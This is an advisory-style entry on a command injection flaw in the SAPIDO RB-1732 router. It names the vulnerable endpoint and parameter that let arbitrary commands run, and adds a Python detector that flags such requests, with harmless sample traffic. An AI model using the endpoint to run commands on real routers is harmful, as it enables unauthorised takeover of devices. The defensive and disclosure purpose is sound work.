Vendor: RB-1732
By: k1nm3n.aotoi
CVSS: 7.5 (HIGH)
Command Injection
CWE: 78
Product Name: RB-1732
Affected Version From: RB-1732 V2.0.43
Affected Version To: RB-1732 V2.0.43
Patch Exists: N/A
Related CWE: N/A
CPE: h:sapido:rb-1732
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019
SAPIDO RB-1732 command line execution
This exploit allows an attacker to execute arbitrary commands on the vulnerable SAPIDO RB-1732 router. The exploit sends a POST request to the router's /goform/formSysCmd page with the command to be executed in the sysCmd parameter. The response contains the output of the command in a textarea element.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in system commands.
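
For monitoring, the request described above (a POST to /goform/formSysCmd carrying a sysCmd parameter) can be flagged in traffic seen by a proxy or sensor in front of the device. The following is an added example, not part of the original entry; the function names, severity labels and sample requests are constructed for illustration, and it assumes raw HTTP requests are available to inspect.

```python
import posixpath
from urllib.parse import parse_qs, unquote

TARGET_PATH = "/goform/formsyscmd"  # endpoint named in this entry, lower-cased
TARGET_PARAM = "sysCmd"             # parameter named in this entry


def normalise_path(target: str) -> str:
    """Decode and collapse a request target so padded or percent-encoded
    spellings of the same path compare equal (case is folded on purpose,
    which may over-match on a case-sensitive server)."""
    path = unquote(target.partition("?")[0])
    return posixpath.normpath("/" + path.lstrip("/")).lower()


def inspect_request(raw: str):
    """Return a finding for a raw HTTP request to the endpoint, else None."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n")[0].split()
    if len(parts) < 2:
        return None  # no parseable request line
    method, target = parts[0].upper(), parts[1]
    if normalise_path(target) != TARGET_PATH:
        return None
    # Collect the parameter from the form body and from the query string.
    params = parse_qs(body.strip(), keep_blank_values=True)
    query = parse_qs(target.partition("?")[2], keep_blank_values=True)
    commands = params.get(TARGET_PARAM, []) + query.get(TARGET_PARAM, [])
    return {
        "method": method,
        "target": target,
        "commands": commands,
        # Any hit is worth review; a POST carrying a command matches the entry.
        "severity": "high" if method == "POST" and commands else "medium",
    }


# Constructed sample requests (not captured from a real device).
SAMPLES = [
    "POST /goform/formSysCmd HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\nsysCmd=uptime",
    "POST //goform/./%66ormSysCmd HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\nsysCmd=uptime",
    "GET /index.asp HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(sample))
```

Path normalisation runs before the comparison so that padded or percent-encoded spellings of the same endpoint are not missed by a literal string match.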